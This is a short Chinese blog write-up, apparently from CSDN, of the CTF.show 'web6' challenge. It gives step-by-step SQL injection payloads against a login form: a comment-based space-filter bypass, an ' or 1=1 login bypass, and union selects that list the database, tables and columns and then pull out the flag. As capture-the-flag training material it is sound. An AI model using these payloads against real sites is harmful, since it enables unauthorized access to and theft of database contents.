CTF.show:web6-爱代码爱编程
登陆窗,先想到sql注入
抓包测试发现失败
利用/**/代替空格进行绕过
username=admin'/**/or/**/1=1#&password=123456
利用联合查询找到回显位置
username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456
查数据库名
username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123456
查询数据库内数据表名称
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123456
发现了flag的表,查看该表字段名
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123456
查询字段信息
username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=123456
得到flag
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_46230755/article/details/112664567